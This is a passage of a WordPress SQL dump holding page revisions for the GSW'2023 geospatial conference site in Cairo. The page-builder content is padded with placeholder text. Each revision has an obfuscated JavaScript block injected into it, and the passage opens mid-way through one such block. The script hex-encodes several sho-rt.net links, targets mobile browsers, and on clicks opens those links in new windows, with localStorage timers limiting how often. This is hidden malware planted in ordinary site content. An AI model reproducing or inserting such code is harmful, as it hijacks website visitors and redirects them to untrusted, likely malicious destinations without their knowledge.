_0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Home_n','','inherit','closed','closed','','3066-revision-v1','','','2022-11-09 16:18:25','2022-11-09 16:18:25','',3066,'https://gsw2023.com/?p=3158',0,'revision','',0);
INSERT INTO `dnctiavkr_posts` VALUES
(3159,1,'2022-11-09 16:19:10','2022-11-09 16:19:10','[vc_row css=\".vc_custom_1668005747937{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/2\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text]\r\n<h3>EGYPT GSW\'2023</h3>\r\n<h3>The First Geospatial Week in Africa and The Middle East</h3>\r\n[/vc_column_text][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"right\" css=\".vc_custom_1668010492701{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#3724e5\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1667948825977{margin-top: 25px !important;}\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text]\r\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo City stars Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\r\n[/vc_column_text][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]aaaaaaaaaaaaa\r\n\r\naaaaaaaaaaaa[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]aaaaaaaaaaaaa\r\n\r\naaaaaaaaaaaa[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]aaaaaaaaaaaaa\r\n\r\naaaaaaaaaaaa[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]aaaaaaaaaaaaa\r\n\r\naaaaaaaaaaaa[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3082\" img_size=\"799x452\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^2275|url^https://gsw2023.com/wp-content/uploads/2022/10/aast32.jpg|caption^null|alt^null|title^aast32|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1668010285886{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION FEES\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]Opening of registration platform: soon[/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][vc_column][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#ffffff\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"white\" style=\"shadow\" border_width=\"10\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#311b92\" tick_col=\"#ffffff\" tick_sep_col=\"#eeee22\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#eeee22\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Home_n','','inherit','closed','closed','','3066-revision-v1','','','2022-11-09 16:19:10','2022-11-09 16:19:10','',3066,'https://gsw2023.com/?p=3159',0,'revision','',0),
(3160,1,'2022-11-09 16:19:55','2022-11-09 16:19:55','[vc_row css=\".vc_custom_1668005747937{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/2\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text]\r\n<h3>EGYPT GSW\'2023</h3>\r\n<h3>The First Geospatial Week in Africa and The Middle East</h3>\r\n[/vc_column_text][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"right\" css=\".vc_custom_1668010492701{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#3724e5\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1667948825977{margin-top: 25px !important;}\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text]\r\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo City stars Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\r\n[/vc_column_text][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]aaaaaaaaaaaaa\r\n\r\naaaaaaaaaaaa[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]aaaaaaaaaaaaa\r\n\r\naaaaaaaaaaaa[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]aaaaaaaaaaaaa\r\n\r\naaaaaaaaaaaa[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]aaaaaaaaaaaaa\r\n\r\naaaaaaaaaaaa[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3082\" img_size=\"799x652\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^2275|url^https://gsw2023.com/wp-content/uploads/2022/10/aast32.jpg|caption^null|alt^null|title^aast32|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1668010285886{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION FEES\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]Opening of registration platform: soon[/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][vc_column][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#ffffff\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"white\" style=\"shadow\" border_width=\"10\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#311b92\" tick_col=\"#ffffff\" tick_sep_col=\"#eeee22\" 